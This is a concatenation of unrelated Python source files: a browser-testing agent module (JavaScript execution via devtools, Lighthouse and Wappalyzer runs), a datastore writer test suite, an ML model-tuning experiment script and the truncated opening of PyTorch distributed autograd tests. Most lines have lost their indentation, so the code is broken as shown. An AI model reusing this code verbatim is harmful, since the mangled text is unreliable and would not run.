with io.open(script_file_path, 'r', encoding='utf-8') as script_file:
script = script_file.read()
if script is not None:
ret = self.devtools.execute_js(script)
return ret
def collect_browser_metrics(self, task):
"""Collect all of the in-page browser metrics that we need"""
user_timing = self.run_js_file('user_timing.js')
if user_timing is not None:
path = os.path.join(task['dir'], task['prefix'] + '_timed_events.json.gz')
with gzip.open(path, GZIP_TEXT, 7) as outfile:
outfile.write(json.dumps(user_timing))
page_data = self.run_js_file('page_data.js')
if page_data is not None:
task['page_data'].update(page_data)
if 'customMetrics' in self.job:
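            # Each custom metric snippet is wrapped in a function and guarded with
            # try/catch so one failing metric does not prevent the others from
            # being collected.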
custom_metrics = {}
for name in self.job['customMetrics']:
script = 'var wptCustomMetric = function() {' +\
self.job['customMetrics'][name] +\
'};try{wptCustomMetric();}catch(e){};'
custom_metrics[name] = self.devtools.execute_js(script)
path = os.path.join(task['dir'], task['prefix'] + '_metrics.json.gz')
with gzip.open(path, GZIP_TEXT, 7) as outfile:
outfile.write(json.dumps(custom_metrics))
if 'heroElementTimes' in self.job and self.job['heroElementTimes']:
hero_elements = None
custom_hero_selectors = {}
if 'heroElements' in self.job:
custom_hero_selectors = self.job['heroElements']
with io.open(os.path.join(self.script_dir, 'hero_elements.js'), 'r', encoding='utf-8') as script_file:
hero_elements_script = script_file.read()
script = hero_elements_script + '(' + json.dumps(custom_hero_selectors) + ')'
hero_elements = self.devtools.execute_js(script)
if hero_elements is not None:
logging.debug('Hero Elements: %s', json.dumps(hero_elements))
path = os.path.join(task['dir'], task['prefix'] + '_hero_elements.json.gz')
with gzip.open(path, GZIP_TEXT, 7) as outfile:
outfile.write(json.dumps(hero_elements))
def process_command(self, command):
"""Process an individual script command"""
logging.debug("Processing script command:")
logging.debug(command)
if command['command'] == 'navigate':
self.task['page_data']['URL'] = command['target']
            url = str(command['target']).replace('"', '\\"')
script = 'window.location="{0}";'.format(url)
script = self.prepare_script_for_record(script) #pylint: disable=no-member
self.devtools.start_navigating()
self.devtools.execute_js(script)
elif command['command'] == 'logdata':
self.task['combine_steps'] = False
if int(re.search(r'\d+', str(command['target'])).group()):
logging.debug("Data logging enabled")
self.task['log_data'] = True
else:
logging.debug("Data logging disabled")
self.task['log_data'] = False
elif command['command'] == 'combinesteps':
self.task['log_data'] = True
self.task['combine_steps'] = True
elif command['command'] == 'seteventname':
self.event_name = command['target']
elif command['command'] == 'exec':
script = command['target']
if command['record']:
script = self.prepare_script_for_record(script) #pylint: disable=no-member
self.devtools.start_navigating()
self.devtools.execute_js(script)
elif command['command'] == 'sleep':
delay = min(60, max(0, int(re.search(r'\d+', str(command['target'])).group())))
if delay > 0:
time.sleep(delay)
elif command['command'] == 'setabm':
self.task['stop_at_onload'] = bool('target' in command and
int(re.search(r'\d+',
str(command['target'])).group()) == 0)
elif command['command'] == 'setactivitytimeout':
if 'target' in command:
milliseconds = int(re.search(r'\d+', str(command['target'])).group())
self.task['activity_time'] = max(0, min(30, float(milliseconds) / 1000.0))
elif command['command'] == 'setuseragent':
self.task['user_agent_string'] = command['target']
elif command['command'] == 'setcookie':
if 'target' in command and 'value' in command:
url = command['target'].strip()
cookie = command['value']
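                # Keep only the leading name=value pair, dropping any cookie
                # attributes (e.g. "foo=bar; Path=/" -> name "foo", value "bar").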
pos = cookie.find(';')
if pos > 0:
cookie = cookie[:pos]
pos = cookie.find('=')
if pos > 0:
name = cookie[:pos].strip()
value = cookie[pos + 1:].strip()
if len(name) and len(value) and len(url):
self.devtools.send_command('Network.setCookie',
{'url': url, 'name': name, 'value': value})
elif command['command'] == 'setlocation':
try:
if 'target' in command and command['target'].find(',') > 0:
accuracy = 0
if 'value' in command and re.match(r'\d+', command['value']):
accuracy = int(re.search(r'\d+', str(command['value'])).group())
parts = command['target'].split(',')
lat = float(parts[0])
lng = float(parts[1])
self.devtools.send_command(
'Emulation.setGeolocationOverride',
{'latitude': lat, 'longitude': lng,
'accuracy': accuracy})
except Exception:
logging.exception('Error setting location')
elif command['command'] == 'addheader':
self.devtools.set_header(command['target'])
elif command['command'] == 'setheader':
self.devtools.set_header(command['target'])
elif command['command'] == 'resetheaders':
self.devtools.reset_headers()
elif command['command'] == 'clearcache':
self.devtools.clear_cache()
elif command['command'] == 'disablecache':
disable_cache = bool('target' in command and \
int(re.search(r'\d+',
str(command['target'])).group()) == 1)
self.devtools.disable_cache(disable_cache)
def navigate(self, url):
"""Navigate to the given URL"""
if self.devtools is not None:
self.devtools.send_command('Page.navigate', {'url': url}, wait=True)
def get_requests(self):
"""Get the request details for running an optimization check"""
requests = None
if self.devtools is not None:
requests = self.devtools.get_requests()
return requests
def lighthouse_thread(self):
"""Run lighthouse in a thread so we can kill it if it times out"""
cmd = self.lighthouse_command
self.task['lighthouse_log'] = cmd + "\n"
logging.debug(cmd)
proc = subprocess.Popen(cmd, shell=True, stderr=subprocess.PIPE)
for line in iter(proc.stderr.readline, b''):
try:
line = unicode(line)
logging.debug(line.rstrip())
self.task['lighthouse_log'] += line
except Exception:
logging.exception('Error recording lighthouse log')
proc.communicate()
def run_lighthouse_test(self, task):
"""Run a lighthouse test against the current browser session"""
task['lighthouse_log'] = ''
if 'url' in self.job and self.job['url'] is not None:
self.job['shaper'].configure(self.job, task)
output_path = os.path.join(task['dir'], 'lighthouse.json')
json_file = os.path.join(task['dir'], 'lighthouse.report.json')
json_gzip = os.path.join(task['dir'], 'lighthouse.json.gz')
html_file = os.path.join(task['dir'], 'lighthouse.report.html')
html_gzip = os.path.join(task['dir'], 'lighthouse.html.gz')
time_limit = min(int(task['time_limit']), 80)
command = ['lighthouse',
'"{0}"'.format(self.job['url']),
'--channel', 'wpt',
'--disable-network-throttling',
'--disable-cpu-throttling',
'--throttling-method', 'provided',
'--enable-error-reporting',
'--max-wait-for-load', str(int(time_limit * 1000)),
'--port', str(task['port']),
'--output', 'html',
'--output', 'json',
'--output-path', '"{0}"'.format(output_path)]
if self.job['keep_lighthouse_trace']:
command.append('--save-assets')
if not self.job['keep_lighthouse_screenshots']:
command.extend(['--skip-audits', 'screenshot-thumbnails'])
if self.options.android or 'mobile' not in self.job or not self.job['mobile']:
command.extend(['--emulated-form-factor', 'none'])
if 'user_agent_string' in self.job:
sanitized_user_agent = re.sub(r'[^a-zA-Z0-9_\-.;:/()\[\] ]+', '', self.job['user_agent_string'])
command.append('--chrome-flags="--user-agent=\'{0}\'"'.format(sanitized_user_agent))
if len(task['block']):
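                # Single-quote each blocked URL pattern for the shell (escaping any
                # embedded single quotes), since the joined command line is run
                # with shell=True.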
for pattern in task['block']:
pattern = "'" + pattern.replace("'", "'\\''") + "'"
command.extend(['--blocked-url-patterns', pattern])
if 'headers' in task:
headers_file = os.path.join(task['dir'], 'lighthouse-headers.json')
with io.open(headers_file, 'w', encoding='utf-8') as f_out:
json.dump(task['headers'], f_out)
command.extend(['--extra-headers', '"{0}"'.format(headers_file)])
cmd = ' '.join(command)
self.lighthouse_command = cmd
# Give lighthouse up to 10 minutes to run all of the audits
try:
lh_thread = threading.Thread(target=self.lighthouse_thread)
lh_thread.start()
lh_thread.join(600)
except Exception:
logging.exception('Error running lighthouse audits')
from .os_util import kill_all
kill_all('node', True)
self.job['shaper'].reset()
# Rename and compress the trace file, delete the other assets
if self.job['keep_lighthouse_trace']:
try:
lh_trace_src = os.path.join(task['dir'], 'lighthouse-0.trace.json')
if os.path.isfile(lh_trace_src):
# read the JSON in and re-write it line by line to match the other traces
with io.open(lh_trace_src, 'r', encoding='utf-8') as f_in:
trace = json.load(f_in)
if trace is not None and 'traceEvents' in trace:
lighthouse_trace = os.path.join(task['dir'],
'lighthouse_trace.json.gz')
with gzip.open(lighthouse_trace, GZIP_TEXT, 7) as f_out:
f_out.write('{"traceEvents":[{}')
for trace_event in trace['traceEvents']:
f_out.write(",\n")
f_out.write(json.dumps(trace_event))
f_out.write("\n]}")
except Exception:
logging.exception('Error processing lighthouse trace')
# Delete all the left-over lighthouse assets
files = glob.glob(os.path.join(task['dir'], 'lighthouse-*'))
for file_path in files:
try:
os.remove(file_path)
except Exception:
pass
if os.path.isfile(json_file):
lh_report = None
with io.open(json_file, 'r', encoding='utf-8') as f_in:
lh_report = json.load(f_in)
with open(json_file, 'rb') as f_in:
with gzip.open(json_gzip, 'wb', 7) as f_out:
shutil.copyfileobj(f_in, f_out)
try:
os.remove(json_file)
except Exception:
pass
# Extract the audit scores
if lh_report is not None:
audits = {}
# v1.x
if 'aggregations' in lh_report:
for entry in lh_report['aggregations']:
if 'name' in entry and 'total' in entry and \
'scored' in entry and entry['scored']:
name = entry['name'].replace(' ', '')
audits[name] = entry['total']
# v2.x
elif 'reportCategories' in lh_report:
for category in lh_report['reportCategories']:
if 'name' in category and 'score' in category:
category_name = category['name'].replace(' ', '')
score = float(category['score']) / 100.0
audits[category_name] = score
if category['name'] == 'Performance' and 'audits' in category:
for audit in category['audits']:
if 'id' in audit and 'group' in audit and \
audit['group'] == 'perf-metric' and \
'result' in audit and \
'rawValue' in audit['result']:
name = category_name + '.' + \
audit['id'].replace(' ', '')
audits[name] = audit['result']['rawValue']
# v3.x
elif 'categories' in lh_report:
for categoryId in lh_report['categories']:
category = lh_report['categories'][categoryId]
if 'title' not in category or 'score' not in category:
continue
category_title = category['title'].replace(' ', '')
audits[category_title] = category['score']
if categoryId != 'performance' or 'auditRefs' not in category:
continue
for auditRef in category['auditRefs']:
if auditRef['id'] not in lh_report['audits']:
continue
if 'group' not in auditRef or auditRef['group'] != 'metrics':
continue
audit = lh_report['audits'][auditRef['id']]
name = category_title + '.' + audit['id']
if 'rawValue' in audit:
audits[name] = audit['rawValue']
elif 'numericValue' in audit:
audits[name] = audit['numericValue']
audits_gzip = os.path.join(task['dir'], 'lighthouse_audits.json.gz')
with gzip.open(audits_gzip, GZIP_TEXT, 7) as f_out:
json.dump(audits, f_out)
# Compress the HTML lighthouse report
if os.path.isfile(html_file):
try:
with open(html_file, 'rb') as f_in:
with gzip.open(html_gzip, 'wb', 7) as f_out:
shutil.copyfileobj(f_in, f_out)
os.remove(html_file)
except Exception:
logging.exception('Error compressing lighthouse report')
def wappalyzer_detect(self, task, request_headers):
"""Run the wappalyzer detection"""
# Run the Wappalyzer detection (give it 30 seconds at most)
completed = False
if self.devtools is not None:
try:
logging.debug('wappalyzer_detect')
detect_script = self.wappalyzer_script(request_headers)
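                # The detection script is expected to return a promise that resolves
                # to a JSON string with 'categories' and 'apps' keys (hence the
                # awaitPromise and returnByValue flags below).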
response = self.devtools.send_command("Runtime.evaluate",
{'expression': detect_script,
'awaitPromise': True,
'returnByValue': True,
'timeout': 30000},
wait=True, timeout=30)
if response is not None and 'result' in response and\
'result' in response['result'] and\
'value' in response['result']['result']:
result = response['result']['result']['value']
if result:
completed = True
logging.debug(result)
detected = json.loads(result)
if 'categories' in detected:
task['page_data']['detected'] = dict(detected['categories'])
if 'apps' in detected:
task['page_data']['detected_apps'] = dict(detected['apps'])
except Exception as err:
logging.exception("Exception running Wappalyzer: %s", err.__str__())
if not completed:
task['page_data']['wappalyzer_failed'] = 1
def wappalyzer_script(self, response_headers):
"""Build the wappalyzer script to run in-browser"""
script = None
try:
with open(os.path.join(self.support_path, 'Wappalyzer', 'script.js')) as f_in:
script = f_in.read()
if script is not None:
wappalyzer = None
with open(os.path.join(self.support_path, 'Wappalyzer', 'wappalyzer.js')) as f_in:
wappalyzer = f_in.read()
if wappalyzer is not None:
json_data = None
with open(os.path.join(self.support_path, 'Wappalyzer', 'apps.json')) as f_in:
json_data = f_in.read()
                    if json_data is not None:
# Format the headers as a dictionary of lists
headers = {}
if response_headers is not None:
if isinstance(response_headers, dict):
for key in response_headers:
values = []
entry = response_headers[key]
if isinstance(entry, list):
values = entry
elif isinstance(entry, (str, unicode)):
entries = entry.split('\n')
for value in entries:
values.append(value.strip())
if values:
headers[key.lower()] = values
elif isinstance(response_headers, list):
for pair in response_headers:
if isinstance(pair, (str, unicode)):
parts = pair.split(':', 1)
key = parts[0].strip(' :\n\t').lower()
value = parts[1].strip(' :\n\t')
if key not in headers:
headers[key] = []
headers[key].append(value)
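                        # Inject the wappalyzer library, the fingerprint JSON and the
                        # normalized response headers into the script template.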
script = script.replace('%WAPPALYZER%', wappalyzer)
script = script.replace('%JSON%', json_data)
script = script.replace('%RESPONSE_HEADERS%', json.dumps(headers))
except Exception:
logging.exception('Error building wappalyzer script')
return script
|
test_writer_service.py
|
import threading
from threading import Thread
from unittest.mock import MagicMock
import pytest
from datastore.shared.di import injector
from datastore.shared.services import EnvironmentService
from datastore.writer.core import (
Database,
Messaging,
OccLocker,
RequestCreateEvent,
RequestDeleteEvent,
Writer,
WriteRequest,
)
from datastore.writer.core.event_executor import EventExecutor
from datastore.writer.core.event_translator import EventTranslator
from datastore.writer.core.writer_service import WriterService
from tests import reset_di # noqa
@pytest.fixture(autouse=True)
def provide_di(reset_di): # noqa
injector.register_as_singleton(Database, MagicMock)
injector.register_as_singleton(OccLocker, lambda: MagicMock(unsafe=True))
injector.register_as_singleton(EventTranslator, MagicMock)
injector.register_as_singleton(EventExecutor, MagicMock)
injector.register_as_singleton(Messaging, MagicMock)
injector.register(Writer, WriterService)
injector.register(EnvironmentService, EnvironmentService)
yield
@pytest.fixture()
def writer(provide_di):
yield injector.get(Writer)
@pytest.fixture()
def database(provide_di):
yield injector.get(Database)
@pytest.fixture()
def occ_locker(provide_di):
yield injector.get(OccLocker)
@pytest.fixture()
def event_translator(provide_di):
yield injector.get(EventTranslator)
@pytest.fixture()
def event_executor(provide_di):
yield injector.get(EventExecutor)
@pytest.fixture()
def messaging(provide_di):
yield injector.get(Messaging)
def test_writer_creation(writer):
assert bool(writer)
def test_writer_distribution(
writer, database, occ_locker, event_translator, event_executor, messaging
):
events = [RequestCreateEvent("a/1", {"a": 1}), RequestDeleteEvent("b/2")]
locked_fields = {
"c/1": 3,
"c/2/f": 4,
"c/f": 5,
}
write_request = WriteRequest(events, {}, 1, locked_fields)
event_translator.translate = MagicMock(return_value=[2, 3, 4])
event_executor.update = eeu = MagicMock()
messaging.handle_events = he = MagicMock()
writer.write([write_request])
event_translator.translate.assert_called_with(events)
database.get_context.assert_called()
occ_locker.assert_locked_fields.assert_called_with(write_request)
database.insert_events.assert_called_with([2, 3, 4], {}, 1)
eeu.assert_called_once()
he.assert_called_once()
def test_writer_reserve_ids(writer, database):
writer.reserve_ids("collection", 4)
database.get_context.assert_called()
database.reserve_next_ids.assert_called_with("collection", 4)
def test_writer_truncate_db(writer, database):
writer.truncate_db()
database.get_context.assert_called()
database.truncate_db.assert_called()
def test_writer_single_thread(writer):
writer.locks = [threading.Lock(), threading.Lock()]
writer.locks[0].acquire()
writer.current_lock = 0
writer.position = 0
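    # locks[0] is held by the test, so the first write blocks inside the mocked
    # write_with_database_context; the second write should queue behind it
    # (presumably on the writer's internal lock) and never reach locks[1],
    # which is what the assertions below verify.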
def wait_for_lock(*args, **kwargs):
lock = writer.locks[writer.current_lock]
writer.current_lock += 1
lock.acquire()
lock.release()
writer.event_translator = MagicMock()
writer.messaging = MagicMock()
writer.write_with_database_context = MagicMock(side_effect=wait_for_lock)
thread1 = Thread(target=writer.write, args=[[MagicMock()]])
thread1.start()
thread2 = Thread(target=writer.write, args=[[MagicMock()]])
thread2.start()
thread1.join(0.5)
assert thread1.is_alive()
assert thread2.is_alive()
assert writer.locks[0].locked()
assert not writer.locks[1].locked()
writer.locks[0].release()
thread1.join(0.05)
thread2.join(0.05)
assert not thread1.is_alive()
assert not thread2.is_alive()
|
ours.py
|
import numpy as np
import multiprocessing as mp
from pdb import set_trace
from copy import deepcopy
from utmLib import utils
from utmLib.clses import Timer
from utmLib.parmapper import Xmap
from core.contcnet import ContCNet, nn_conf
from core.varpick import most_var, hard_max_mincorr
from core.tinylib import evaluate_result, logmass_statistic, pca_analysis
def fast_log_mass(m, data):
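    # Total log-mass of a sample: log-mass of the cutset variables x under m.px
    # plus the conditional log-mass of the remaining variables from m.score
    # (a reading of the code below; the model internals live in core.contcnet).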
x_data = data[:,m.xids]
px_logmass = np.log(m.px.mass(x_data))
pyx_logmass = m.score(data, return_mass=True)
logmass = px_logmass + pyx_logmass
return logmass
def worker_func(param, extra):
# actual task to do
def _run_(param, extra, Q):
i, (X, lr, fr) = param
train, test, query, gt, sample_size, cache_dir, device, gpuid = extra
cf = deepcopy(nn_conf)
cf.fsize = fr
cf.max_LR = lr
if device != 'cpu':
cf.device = 'cuda:{}'.format(gpuid[i % len(gpuid)])
else:
cf.device = 'cpu'
model = ContCNet(mode='MixMG', conf=cf).fit(train, cutset_var=X, verbose=False)
model.save_as_file('{}/ours-{}.pt'.format(cache_dir, i))
pred = model.predict(test, query, N=int(sample_size/2), parallel=1)
perf = evaluate_result(gt, pred, query, output_var=1)
Q.put( (perf,i) )
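    # Each trial runs in its own child process and reports (perf, index) through
    # a queue, presumably so GPU memory and framework state are fully released
    # between hyper-parameter trials.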
queue = mp.Queue()
p = mp.Process(target=_run_, args = (param, extra, queue))
p.start()
ret = queue.get()
p.join()
p.terminate()
return ret
def tune_and_fit(train, valid, masked_valid, options, verbose = True):
full_train = np.vstack([train, valid])
# define hyper params to tune
cond_pcts = [i/10.0 for i in range(1,5)]
pick_method = [most_var]
max_LR = [0.025, 0.01, 0.004]
if options.transform is None:
feature_ratio = list(np.unique( pca_analysis(full_train, percentiles=[0.9, 0.95, 0.97, 0.99]) ))
else:
feature_ratio = [train.shape[1]]
allX = {}
for p,f in utils.product(cond_pcts, pick_method):
X = f(full_train, (p,2), np.inf, exclude = options.exclude)
X = tuple(sorted(X))
if X not in allX:
allX[X] = [ '{}-{}%'.format(f._name_, int(p*100)) ]
else:
allX[X].append( '{}-{}%'.format(f._name_, int(p*100)) )
varX = list(allX.keys())
maskV, queryV = masked_valid
params = list(enumerate(utils.product(varX, max_LR, feature_ratio)))
extra = (train, maskV, queryV, valid, options.sample_size, options.cache_dir, options.device, options.gpuid)
if verbose:
print( 'Total number of hyper-params:{}'.format(len(params)) )
options.procs = options.cpus if options.device == 'cpu' else (options.gpus*len(options.gpuid))
options.procs = min(options.procs, len(params))
tune_result = list(Xmap(worker_func, params, N=options.procs, daemon=False, progress=True, args=(extra,) ))
tune_result.sort()
# determine best idx
b_rmse, b_std = tune_result[0][0]
best_val = 2.0
best_idx = None
N = max(5, int(len(params)*0.1 + 1))
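    # Among the top-N results, normalize each candidate's RMSE and STD by the best
    # observed values and pick the candidate that minimizes their product.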
for perf, i in tune_result[0:N]:
r_rmse = perf[0] / b_rmse
r_std = perf[1] / b_std
val = r_rmse * r_std
if val < best_val:
best_val = val
best_idx = i
    # print the top hyper-params and their performance
ntop = (N*5) if verbose else 1
for perf, i in tune_result[0:ntop]:
X, lr, fr = params[i][1]
method_str = '/'.join(allX[X])
postfix = '<- chosen' if i == best_idx else ''
print('{:2d}-Methods:{} ## MaxLR:{} FR:{} -> RMSE:{:.4f} STD:{:.4f} {}'.format(i, method_str, lr, fr, perf[0], perf[1], postfix))
best_model_path = '{}/ours-{}.pt'.format(options.cache_dir, best_idx)
def fine_tune():
ft_device = 'cpu' if options.device == 'cpu' else 'cuda:0'
model = ContCNet.load_from_file(best_model_path, device = ft_device)
model = model.refit(full_train, verbose = verbose)
model.save_as_file(best_model_path + '.fine_tune')
p = mp.Process(target=fine_tune)
p.start()
p.join()
p.terminate()
model = ContCNet.load_from_file(best_model_path + '.fine_tune', device = 'cpu')
return model
def run_exp(dataset, options):
print('Running our model ....')
np.random.seed(options.seed)
train, valid, test_set = dataset
full_train = np.vstack([train, valid])
myclock = Timer()
model_file = '{}/ours.model'.format(options.dir)
try:
model = ContCNet.load_from_file(model_file, device = 'cpu')
print('Load pretrained ccnet model.')
    except Exception:
model = tune_and_fit(train, valid, options.valid_extra, options)
if options.dir != '':
model.save_as_file(model_file)
# model.py.gbn.g.dump(fpath = '{}/leaf_gbn.jpg'.format(options.dir))
myclock.ring('model fitting')
N = len(model.yids)
nrm = model.removed_counter
total = int(N * (N-1)/2)
print('Number of edges removed: {}/{} = {:.2f}%'.format(nrm, total, 100*nrm/total))
print('MixMG number of components: {}'.format(model.px.W.size))
train_logmass = fast_log_mass(model, full_train)
test_logmass = fast_log_mass(model, options.gt)
print('Ours train logmass: p25 {:.6f} median {:.6f} p75 {:.6f} avg {:.6f}'.format( *logmass_statistic(train_logmass) ))
print('Ours test logmass: p25 {:.6f} median {:.6f} p75 {:.6f} avg {:.6f}'.format( *logmass_statistic(test_logmass) ))
myclock.ring('Ours logmass computation')
result = []
for i,query in enumerate(options.query_var):
model_result = []
test = test_set[i].copy()
pred = model.predict(test, query, N = options.sample_size, parallel = options.cpus)
model_result.append( ('Ours', pred ) )
if isinstance(options.missing[i], float) and options.missing[i] == 0:
            # only output when doing MAP inference, not MMAP
pred_logmass = fast_log_mass(model, pred)
print('S{}, Ours pred logmass: p25 {:.6f} median {:.6f} p75 {:.6f} avg {:.6f}'.format(i, *logmass_statistic(pred_logmass) ))
myclock.ring('Ours predict')
result.append(model_result)
return result
|
dist_autograd_test.py
|
import sys
import threading
import time
import unittest
from enum import Enum
import torch
from datetime import timedelta
import torch.distributed as dist
import torch.distributed.autograd as dist_autograd
import torch.distributed.rpc as rpc
import torch.testing._internal.dist_utils
from torch.autograd import Function
from torch.autograd.function import once_differentiable
from torch.testing._internal.common_utils import IS_MACOS
from torch.testing._internal.dist_utils import (
dist_init,
initialize_pg,
wait_until_node_failure,
worker_name,
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
from torch.testing._internal.common_distributed import skip_if_lt_x_gpu
# Right now we test up to 3-layer nested rpc calls.
# rpc_done[1] and ctx_ids[1] record that the rpc from the previous rank is done
# and the context id sent from that rank, respectively.
# rpc_done[2] and ctx_ids[2] do the same for the rank two hops back.
# rpc_done[3] and ctx_ids[3] do the same for the rank three hops back.
# rpc_done[0] and ctx_ids[0] refer to the current rank, but are mostly unused.
rpc_done = [False, False, False, False]
ctx_ids = [-1, -1, -1, -1]
known_context_ids = set()
requires_grad_tensor = torch.ones(3, 3, requires_grad=True)
# Send rpc done info and context_id to
# dst_rank = (self.rank + rank_distance) % self.world_size
# we don't need a lock here since the GIL is held while executing remote
# python UDFs, so access is serialized across several workers.
def _set_rpc_done(ctx_id, rank_distance):
global rpc_done
global ctx_ids
global known_context_ids
rpc_done[rank_distance] = True
ctx_ids[rank_distance] = ctx_id
known_context_ids.add(ctx_id)
def _check_rpc_done(rank_distance):
while not rpc_done[rank_distance]:
time.sleep(0.1)
def _torch_ones(sizes, requires_grad=False):
return torch.ones(sizes, requires_grad=requires_grad)
# This method must be called on the rref owner, and verifies that the grad of
# the rref tensor equals the given grad.
def _compare_owner_value(context_id, rref, grad):
grads = dist_autograd.get_gradients(context_id)
return torch.equal(grads[rref.local_value()], grad)
def create_tensor():
return torch.ones((3, 3), requires_grad=True)
@torch.jit.script
def create_torchscript_tensor():
# type: () -> Tensor
return torch.ones((3, 3)).requires_grad_()
def my_py_add(t1, t2):
return torch.add(t1, t2)
def my_scalar_add(a, b):
return a + b
def my_rref_add(rref_t1, t2):
ret = torch.add(rref_t1.local_value(), t2)
return ret
@torch.jit.script
def my_script_add(t1, t2):
return torch.add(t1, t2)
@torch.jit.script
def my_script_ref_add(ref_t1, t2):
# type: (RRef[Tensor], Tensor) -> Tensor
t1 = ref_t1.to_here()
return torch.add(t1, t2)
def my_nested_rref_add(dst, rref_t1, t2):
return rpc.rpc_sync(dst, my_rref_add, args=(rref_t1, t2))
def ret_requires_grad():
return requires_grad_tensor
def my_py_nested_call(t1, t2, dst, world_size, hops):
next_dst = (dst + 1) % world_size
if hops > 0:
return rpc.rpc_sync(
worker_name(next_dst),
my_py_nested_call,
args=(t1, t2, next_dst, world_size, hops - 1),
)
else:
return rpc.rpc_sync(worker_name(next_dst), my_py_add, args=(t1, t2))
# After a dist autograd context is cleaned up locally, it should also be cleaned
# up on the other nodes. This helper allows up to timeout_seconds for those RPCs
# to complete and verifies that all known contexts were cleaned up in that time.
def _all_contexts_cleaned_up(timeout_seconds=10):
global known_context_ids
start = time.time()
context_id_to_raised = set()
while (
time.time() - start < timeout_seconds
and context_id_to_raised != known_context_ids
):
for context_id in known_context_ids:
try:
dist_autograd._retrieve_context(context_id)
except RuntimeError:
context_id_to_raised.add(context_id)
# all contexts have been cleaned up if trying to retrieve any context resulted in a RuntimeError.
success = context_id_to_raised == known_context_ids
return success
# This function creates a dist autograd context, runs rpc_sync on the given ps,
# and then blocks until the ps has verified the grads are correctly accumulated.
def _run_trainer(rref_t1, t2, ps, rank_diff):
with dist_autograd.context() as context_id:
ret = rpc.rpc_sync(ps, my_rref_add, args=(rref_t1, t2))
dist_autograd.backward(context_id, [ret.sum()])
# prevent deleting dist autograd context
rpc.rpc_sync(ps, _set_rpc_done, args=(context_id, rank_diff))
rpc.rpc_sync(ps, _check_rpc_done, args=(0,))
# This function is the same as _run_trainer, except rpc calls torchscript
# function "my_script_ref_add" instead of python funciton "my_rref_add"
def _run_trainer_torchscript(rref_t1, t2, ps, rank_diff):
with dist_autograd.context() as context_id:
ret = rpc.rpc_sync(ps, my_script_ref_add, args=(rref_t1, t2))
dist_autograd.backward(context_id, [ret.sum()])
# prevent deleting dist autograd context
rpc.rpc_sync(ps, _set_rpc_done, args=(context_id, rank_diff))
rpc.rpc_sync(ps, _check_rpc_done, args=(0,))
class SimulateBackwardError(Function):
_simulate_error = True
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if SimulateBackwardError._simulate_error:
raise Exception("Simulate error on backward pass")
else:
return input
class ExecMode(Enum):
LOCAL = 1 # Run the operation locally.
RPC_SYNC = 2 # Run the operation using rpc_sync
REMOTE = 3 # Run the operation using remote.
RPC_ASYNC = 4 # Run the operation using rpc_async
class DistAutogradTest(RpcAgentTestFixture):
def _exec_func_with_dst(self, dst, exec_mode, method, *args):
if ExecMode.LOCAL == exec_mode:
if len(args) == 1 and isinstance(args[0], list):
return method(*args[0])
return method(*args)
elif ExecMode.RPC_SYNC == exec_mode:
return rpc.rpc_sync(worker_name(dst), method, args=(args))
elif ExecMode.REMOTE == exec_mode:
return rpc.remote(worker_name(dst), method, args=(args)).to_here()
elif ExecMode.RPC_ASYNC == exec_mode:
fut = rpc.rpc_async(worker_name(dst), method, args=(args))
return fut.wait()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
def _exec_func(self, exec_mode, method, *args):
return self._exec_func_with_dst(
self._next_rank(), exec_mode, method, *args
)
def _next_rank(self):
if hasattr(self, "dst_rank"):
self.dst_rank = (self.dst_rank + 1) % self.world_size
if self.dst_rank == self.rank:
return self._next_rank()
else:
self.dst_rank = (self.rank + 1) % self.world_size
return self.dst_rank
def _check_rpc_done(self, rank_distance):
_check_rpc_done(rank_distance)
@dist_init
def test_autograd_context(self):
# Verify max possible id.
max_auto_increment = 281474976710655
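        # Context ids appear to pack the 16-bit worker id into the high bits and a
        # 48-bit auto-increment counter into the low bits, i.e.
        # context_id = (worker_id << 48) | counter, so the largest counter value is
        # 2**48 - 1 == 281474976710655 (consistent with the shift-by-48 checks below).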
self.assertEqual(
max_auto_increment + (self.worker_id << 48), dist_autograd._get_max_id()
)
context_ids = []
for i in range(200):
with dist_autograd.context() as context_id:
self.assertEqual(
context_id,
dist_autograd._retrieve_context(context_id)._context_id(),
)
# First 16 bits should be worker_id.
self.assertEqual(self.worker_id, context_id >> 48)
context_ids.append(context_id)
for context_id in context_ids:
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
dist_autograd._retrieve_context(context_id)
@dist_init
def test_nested_context(self):
with dist_autograd.context() as context_id:
# Nested contexts not supported.
with self.assertRaisesRegex(
RuntimeError, "Already have an autograd context id for this thread"
):
with dist_autograd.context() as context_id:
pass
# For current context, this rank sends t1 and t2 tensors to dst_rank,
    # then gets back the result tensor t3 = torch.add(t1, t2).
    # For the current context in this rank, it expects a graph like this:
    #  send function:
    #             rpcSendBackward
    #              /          \
    #  t1.AccumulateGrad   t2.AccumulateGrad
    #
    #  recv function:
    #
    #             |
    #     t3.rpcRecvBackward
    #
def _verify_graph_for_first_rpc_call(
self, send_function, recv_function, t1, t2, ret
):
# Retrieve the next functions in the graph.
next_funcs = send_function.next_functions
self.assertEqual(2, len(next_funcs))
# We should now hit t1 and t2 in the autograd graph.
self.assertEqual("torch::autograd::AccumulateGrad", next_funcs[0][0].name())
self.assertEqual(t1, next_funcs[0][0].variable)
self.assertEqual(0, next_funcs[0][1])
self.assertEqual("torch::autograd::AccumulateGrad", next_funcs[1][0].name())
self.assertEqual(t2, next_funcs[1][0].variable)
self.assertEqual(0, next_funcs[1][1])
# Test recv functions.
self.assertEqual(ret.grad_fn, recv_function)
# For a context passed from previous nested chain calls, this rank
# receives two tensors t1 and t2, executes torch.add(t1, t2) and sends
# result tensor t3 back.
    # For this context in this rank, it expects a graph like this:
    #  send and recv functions:
    #        rpcSendBackward
    #               |
    #        t3.AddBackward0
    #         /          \
    #  t1.recvRpcBackward  t2.recvRpcBackward
def _verify_graph_for_rpc_call_exec(self, send_function):
# Verify next function is AddBackward0
next_funcs = send_function.next_functions
self.assertEqual(1, len(next_funcs))
add_backward_fn = next_funcs[0][0]
self.assertEqual("AddBackward0", add_backward_fn.name())
# Verify the next two functions are the same recv backward function.
next_funcs = add_backward_fn.next_functions
self.assertEqual(2, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[1][0].name()
)
self.assertEqual(next_funcs[0][0], next_funcs[1][0])
# For a context passed from previous nested chain calls, this rank
